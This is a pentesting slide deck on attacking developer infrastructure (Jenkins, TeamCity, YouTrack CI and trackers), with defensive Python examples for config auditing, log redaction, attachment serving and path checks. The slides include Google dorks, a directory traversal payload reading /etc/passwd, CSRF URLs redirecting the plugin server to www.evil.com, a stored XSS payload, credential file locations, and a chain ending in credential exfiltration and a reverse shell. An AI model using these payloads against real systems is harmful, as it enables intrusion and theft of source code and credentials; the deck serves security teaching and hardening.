
Simple bugs to pwn the devs


Pentesting the Development ecosystem

Published in: Software

Simple bugs to pwn the devs

  1. About me: Andrey Plastunov, Pentester at [DSEC.RU] (@plastunovaa, @osakaaa)
  2. Agenda: Intro to Dev ecosystem; Why to attack?; Breaking in: Listing the targets; Breaking in: Attack scenarios; Useful Tools; Remediations (short)
  3. Developer ecosystem
  4. Developer ecosystem: IDEs, CI system, VCS, Issue tracker, Deployment server
  5. Why to attack? 1. Directly affects the source code of your product. 2. Works with the developer's identity. 3. Can be a great help to an attacker during network infiltration.
  6. Why to attack? The source code itself: can be stolen; can be modified (infected).
  7. Why to attack? Real life example from some red team. What do they have? 1 target company, 1 unaware software vendor.
  8. Why to attack? Real life example from some red team. What do they want? Get access to the target's network.
  9. Why to attack? Real life example from some red team. But... access the developers' VCS; download the sources; parse the sources for hardcoded values; find passwords for the admin's endpoint; access the endpoint and upload a shell.
  10. Why to attack? The source code itself: can be stolen; can be modified (infected). Your identity (== signing key): signing malicious code with your keys. Elevation of privilege: credentials (Domain, ssh, etc.); code execution (== backend access).
  11. Breaking in
  12. Breaking in: a table scoring the targets by what they give (Sources, Identity, Network creds, Backend); the cell values did not survive the export. One row is marked "Actually, not in scope =)".
  13. Breaking in: IDEs, CI system, VCS, Issue tracker, Deployment server
  14. Breaking in: the CI system is our target: source code access, signing key access, access rights on all other components.
  15. A note on CI: basic scheme: Master, Slave, Plugins, UI.
  16. A note on CI: access level problems. Jenkins: no authentication enabled by default; no roles at all (Unauth). TeamCity: registration enabled by default (often with the "Project developer" role); guest login enabled by default (Guest, Open reg). Google dorks: intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins"; intitle:"Projects - TeamCity"; intitle:"Register a New user Account - TeamCity"
  17-20. A note on CI: UI problems. Weak protection against CSRF attacks (true for default or outdated instances). A great number of XSS vulnerabilities in the CI itself (and also in all those default plugins).
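The weak defaults called out on the access-level and UI-problems slides (security off, no roles, no CSRF protection) can be checked mechanically from the master's configuration file. The following is an added example, not the speaker's code or a Jenkins tool: it parses a Jenkins `$JENKINS_HOME/config.xml` and reports the settings that match the slides' description. The element and class names follow the Jenkins `config.xml` layout as I know it, but treat them as an assumption and compare with your own instance; both embedded configs are constructed samples.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a Jenkins config.xml left on its weak defaults
# (assumption: element/class names as in a stock Jenkins config.xml).
WEAK_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
</hudson>
"""

# Constructed sample of the same file after hardening: auth on, per-project
# roles, a real user realm and a crumb issuer for CSRF protection.
HARDENED_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm"/>
  <crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
  </crumbIssuer>
</hudson>
"""

# Strategies that give every (possibly anonymous or merely logged-in) user
# full control, i.e. "no roles at all" in the slides' words.
NO_ROLE_STRATEGIES = {
    "hudson.security.AuthorizationStrategy$Unsecured",
    "hudson.security.FullControlOnceLoggedInAuthorizationStrategy",
}


def audit_jenkins_config(xml_text):
    """Return a list of (code, message) findings; empty means none of the weak defaults were seen."""
    root = ET.fromstring(xml_text)
    findings = []

    use_security = (root.findtext("useSecurity", default="false") or "").strip().lower()
    if use_security != "true":
        findings.append(("no-auth", "useSecurity is not true: the UI is reachable without authentication"))

    authz = root.find("authorizationStrategy")
    authz_class = authz.get("class", "") if authz is not None else ""
    if authz is None or authz_class in NO_ROLE_STRATEGIES:
        findings.append(("no-roles", f"authorization strategy grants everyone full control: {authz_class or 'missing'}"))

    realm = root.find("securityRealm")
    realm_class = realm.get("class", "") if realm is not None else ""
    if realm is None or realm_class.endswith("$None"):
        findings.append(("no-realm", "no security realm: there are no user accounts to authenticate against"))

    if root.find("crumbIssuer") is None:
        findings.append(("no-csrf", "no crumbIssuer configured: CSRF protection is off"))

    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_jenkins_config(cfg) or "OK")
```

Run it against a copy of the real file (read-only, and never from a build job on the master itself, since the slides explain why build jobs should not see that directory). The check is deliberately pessimistic: a missing element is reported as a finding rather than assumed safe.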
  21. A note on CI: isolation problems. Any project can access (and modify) files of other projects on the same agent: Jenkins agent working dir ../workspace/; TeamCity agent working dir ../../work/ (buildAgent/work/). If Agent == Master: any project can access (and modify) the CI configuration itself: Jenkins configuration dir $JENKINS_HOME/; TeamCity configuration dir .BuildServer/config/
  22. Breaking in: CI (if we have access to it. And we almost certainly have!). Project administrator role -> Create project -> Build project -> Access to the build server's OS.
  23-24. Breaking in: CI (if we have access to it. And we almost certainly have!). Client side vulnerabilities: ...Phish a little... Project administrator role -> Setup XSS payload -> Plant XSS payload -> PWN! Examples can be found here*: https://goo.gl/YUqHbk. Flaws in Jenkins: https://goo.gl/XJZcBk. For flaws in TeamCity you can see the release notes: https://goo.gl/pEcjJm
  25. Breaking in: CI (if we have local network access. TeamCity case). Build agent's misuse (Agent == Master case). Project administrator role.
  26. Breaking in: CI (if we have local network access. TeamCity case). TeamCity Agent directory traversal in XML-RPC API. Function: <Censored until Security update>. Payload example: #logs/../../../../../../../etc/passwd
  27-28. Breaking in: CI (if we have local network access. TeamCity case). Build agent's misuse (Agent == Master case). Hint 1: the default build agent == the master server. Hint 2: the master stores its super admin password in the file ./logs/teamcity-server.log. Hint 3: by default the agent listens on 0.0.0.0. Hint 4: the agent's default listening port is 9090. Project administrator role -> send a crafted XML-RPC payload to the agent* -> perform a MitM attack on agent and master -> we gain the super administrator role.
  29-31. Breaking in: CI. Useful paths for credential gathering (project administrator role). Jenkins: build logs; passwords: ./jobs/<project_name>/config.xml; project's keystore: ./workspace/<project_name>/<keystore_name>/ (often but not always). TeamCity: internal HSQLDB: .BuildServer/system/buildserver.data; project's VCS config: .BuildServer/config/projects/<project name>/vcsRoots; project's ssh keys: .BuildServer/config/projects/<project name>/ssh_keys
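Build logs head the list above because jobs routinely echo the credentials they were given. A defender can run the same observation in the other direction: scan console output before it is stored or shown and redact what leaks. The following is an added example, not the speaker's tool: a small log scanner with a few patterns for the leak types that typically end up in CI logs (basic-auth in clone URLs, password arguments, AWS access key ids, pasted private keys). The log lines are constructed for the example and the secret values in them are made up.

```python
import re

# Constructed sample of CI console output (all values are made up).
SAMPLE_LOG = """\
[Pipeline] sh
+ git clone https://deploy:s3cr3tP4ss@git.example.internal/app.git
Cloning into 'app'...
+ mvn -B deploy -Dpassword=hunter2 -Duser=ci-bot
[INFO] BUILD SUCCESS
+ export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+ cat deploy_key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAexampleexampleexample
-----END RSA PRIVATE KEY-----
+ echo done
"""

# Each pattern names a "pre" group (kept) and a "secret" group (redacted).
PATTERNS = [
    ("basic-auth-in-url",
     re.compile(r"(?P<pre>[a-z][a-z0-9+.-]*://[^/\s:@]+:)(?P<secret>[^@\s]+)(?=@)", re.I)),
    ("password-argument",
     re.compile(r"(?P<pre>(?:-D|--)?pass(?:word|wd)?\s*[=:]\s*)(?P<secret>\S+)", re.I)),
    ("aws-access-key-id",
     re.compile(r"(?P<pre>\b)(?P<secret>AKIA[0-9A-Z]{16})\b")),
]
KEY_BEGIN = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
KEY_END = re.compile(r"-----END [A-Z ]*PRIVATE KEY-----")


def scan_build_log(text):
    """Return (line_no, finding_kind, redacted_line) for every line that leaks a secret.

    Multi-line private key blocks are tracked with a small state machine so the
    body lines between BEGIN and END are redacted as a whole.
    """
    findings = []
    in_key = False
    for n, line in enumerate(text.splitlines(), start=1):
        if in_key:
            findings.append((n, "private-key-block", "[REDACTED]"))
            if KEY_END.search(line):
                in_key = False
            continue
        if KEY_BEGIN.search(line):
            in_key = True
            findings.append((n, "private-key-block", line))
            continue
        redacted = line
        kinds = []
        for kind, rx in PATTERNS:
            if rx.search(redacted):
                kinds.append(kind)
                redacted = rx.sub(lambda m: m.group("pre") + "[REDACTED]", redacted)
        for kind in kinds:
            findings.append((n, kind, redacted))
    return findings


def redact_build_log(text):
    """Return the log with every flagged line replaced by its redacted form."""
    replacements = {n: red for n, _, red in scan_build_log(text)}
    lines = text.splitlines()
    return "\n".join(replacements.get(i, line) for i, line in enumerate(lines, start=1))


if __name__ == "__main__":
    for n, kind, line in scan_build_log(SAMPLE_LOG):
        print(f"line {n:3d} {kind:20s} {line}")
```

Pattern-based scanning is a detection control, not a substitute for keeping secrets out of the job in the first place (credential bindings that mask values, `set +x` around sensitive commands); it is useful precisely for the cases those measures miss.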
  32-33. Breaking in: CI (if we have access to it. And we almost certainly have!). Plugins misuse (Jenkins case). Project administrator role. Modify configuration via CSRF (or XSS). Setting up an evil plugin server via a CSRF vulnerability: /pluginManager/siteConfigure?site=http%3A%2F%2Fwww.evil.com&.crumb=&json=%7B%22site%22%3A+%22http%3A%2F%2Fwww.evil.com%22%2C+%22crumb%22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C
  34. Plugins misuse (Jenkins case). Setting up an evil host as proxy for the plugin server via a CSRF vulnerability: /pluginManager/proxyConfigure?_.name=192.168.1.26&_.port=54321&_.userName=&_.password=&_.noProxyHost=&_.testUrl=http%3A%2F%2Fwww.ya.ru&.crumb=&json=%7B%22name%22%3A+%22192.168.1.26%22%2C+%22port%22%3A+%2254321%22%2C+%22userName%22%3A+%22%22%2C+%22password%22%3A+%22%22%2C+%22noProxyHost%22%3A+%22%22%2C+%22testUrl%22%3A+%22http%3A%2F%2Fwww.ya.ru%22%2C+%22crumb%22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C
  35-36. Plugins misuse (Jenkins case). Project administrator role -> Setup malicious plugin server -> Exploit client-side vulnerability -> PWN via UI + plugin description, or PWN via the plugin itself. For Jenkins you could use Juseppe (https://goo.gl/fiLZc9).
  37. Breaking in: issue tracking (if we do not have access to CI). Administrative privileges -> Access to credentials storage -> Extracting CI credentials -> Access to CI.
  38. Breaking in: issue tracking (if we do not have access to CI). Client side vulnerabilities. Administrative privileges.
  39. Breaking in: issue tracking (if we do not have access to CI). YouTrack stored XSS. Function: upload attachment to issue. Payload example (Content-type: application/xml):
      <?xml version="1.0" encoding="UTF-8"?>
      <Query>
        <SearchTerm>
          <script xmlns="http://www.w3.org/1999/xhtml">
            alert('Hello');
          </script>
        </SearchTerm>
      </Query>
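The stored XSS on this slide works because an uploaded attachment is later served back with a content type the browser will render as a document. The usual fix is on the serving side: never let a user-controlled type decide how the response is interpreted. The following is an added example, not YouTrack's code or configuration: a policy function that decides the response headers for an issue attachment, forcing a download for everything outside a small allowlist of inline-safe types, sniffing for markup hiding behind `text/plain`, and sanitising the filename. The allowlist and sample bodies are my own choices for the example.

```python
import re

# Types the example allows the browser to render inline. This list is a
# choice for the example, not a tracker setting; keep it small.
INLINE_SAFE_TYPES = {"image/png", "image/jpeg", "image/gif", "text/plain", "application/pdf"}


def _normalise_type(declared_content_type):
    # Drop parameters like "; charset=utf-8" and normalise case.
    return (declared_content_type or "").split(";")[0].strip().lower()


def is_inline_safe(body, declared_content_type):
    """True only if the attachment may be rendered inline by the browser."""
    ctype = _normalise_type(declared_content_type)
    if ctype not in INLINE_SAFE_TYPES:
        return False          # application/xml, text/html, image/svg+xml, ... are downloads
    if ctype == "text/plain" and body.lstrip()[:1] == b"<":
        return False          # markup disguised as plain text
    return True


def attachment_response_headers(filename, body, declared_content_type):
    """Headers for serving a user-uploaded issue attachment."""
    # Strip anything that could smuggle a header or a path separator.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename or "")[:120] or "attachment"
    headers = {
        # Browsers must not second-guess the declared type.
        "X-Content-Type-Options": "nosniff",
        # Even if something does render, it runs in an opaque-origin sandbox
        # with no script and no access to the tracker's cookies.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    if is_inline_safe(body, declared_content_type):
        headers["Content-Type"] = _normalise_type(declared_content_type)
        headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
    return headers


# Constructed sample bodies: the XHTML-in-XML payload shape from the slide,
# a PNG signature, and a plain text note.
XML_WITH_SCRIPT = (b'<?xml version="1.0" encoding="UTF-8"?><Query><SearchTerm>'
                   b'<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>'
                   b'</SearchTerm></Query>')
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
TEXT_BODY = b"build failed, see log"

if __name__ == "__main__":
    print(attachment_response_headers("query.xml", XML_WITH_SCRIPT, "application/xml"))
    print(attachment_response_headers("shot.png", PNG_BODY, "image/png"))
```

Serving attachments from a separate origin (a dedicated download host with no session cookies) is the stronger form of the same idea and is worth combining with these headers.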
  40. Breaking in: issue tracking (if we do not have access to CI). Server side vulnerabilities. Access to credentials storage.
  41. Breaking in: issue tracking (if we do not have access to CI). YouTrack directory traversal. Prerequisite: set the backup dir to any value you want on the target OS (admin privileges required). Function: admin/databaseBackup + backupFile. Payload example: /backupFile/passwd
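Both traversal bugs in this deck (the TeamCity agent `#logs/../../..` payload on slide 26 and the YouTrack `backupFile` payload here) come from joining a user-supplied name onto a server directory without checking where the result lands. The following is an added example, not code from either product: one containment check that serves both cases, resolving the candidate path and refusing anything that escapes the base directory, plus a stricter single-component check for parameters that should only ever name a file. The base directories and file names used in it are constructed.

```python
import os


def resolve_under(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or raise ValueError.

    The check is done on the resolved path (symlinks and '..' collapsed), so it
    holds regardless of how the traversal is spelled, as long as the caller
    passes the already URL-decoded value.
    """
    if not user_path or "\x00" in user_path:
        raise ValueError("empty path or NUL byte in path")
    if os.path.isabs(user_path) or user_path.startswith(("/", "\\")):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath is the containment test; a string prefix check alone would
    # accept /srv/logs-other for base /srv/logs.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes {base}: {user_path!r}")
    return candidate


def is_safe_path(base_dir, user_path):
    """Boolean wrapper around resolve_under for callers that just want yes/no."""
    try:
        resolve_under(base_dir, user_path)
        return True
    except ValueError:
        return False


def is_single_component(name):
    """Stricter rule for parameters that must name a file, never a path
    (the backup-file case): no separators, no '.', no '..', nothing hidden."""
    if not name or name in (".", "..") or name.startswith("."):
        return False
    return "/" not in name and "\\" not in name and "\x00" not in name


if __name__ == "__main__":
    # Constructed base directory; it does not need to exist for the check.
    base = "/srv/teamcity/logs"
    for p in ("build-1234.log", "#logs/../../../../../../../etc/passwd", "/backupFile/passwd"):
        print(f"{p!r:45} -> {'ok' if is_safe_path(base, p) else 'REJECTED'}")
```

The single-component rule is the one to reach for first: most "download this file" parameters have no legitimate reason to contain a separator at all, and rejecting separators outright removes the need to reason about encodings and symlinks.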
  42. Breaking in: issue tracking (if we do not have access to CI). Client side vulnerability (e.g. XSS) -> Administrative privileges (based on YouTrack's capabilities) -> Server side vulnerability (e.g. directory traversal) -> Tracker's OS access -> CI credential access. For YouTrack, various configuration properties (including credentials) could be found at: ~/teamsysdata/youtrack/00000000000.xd
  43. Breaking in: all together. Short summary of the video: 1. Upload an XSS with a payload to download the YouTrack credentials to our host. 2. Exploit the XSS against an administrator. 3. Parse the file on our host and find the TeamCity record. 4. Use the TeamCity credentials to upload a shell on TeamCity (I created a small tool to perform the task. It will be available on my github). 5. Get the reverse shell to your host... 6. Profit.
  44. Useful tips and tools: Exploiting TeamCity account creation (if it is disabled at first look): https://beyondbinary.io/articles/teamcity-account-creation; Retrieving the encryption key via the admin script console in Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html; What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability: https://goo.gl/K6CiIE; Serialization Must Die: Act 2: XStream: https://goo.gl/9c68jD; My github (in a couple of weeks ^_^): https://github.com/osakaaa/CI_tools
  45. Remediations. Summary: Never rely on default settings. Never bind to 0.0.0.0. Never rely on the safety of 3rd party components like plugins. Update your tools as soon as a new security advisory is published. Perform additional validation on all user inputs (including sources). Try to isolate projects (Docker?).
  46. The END???
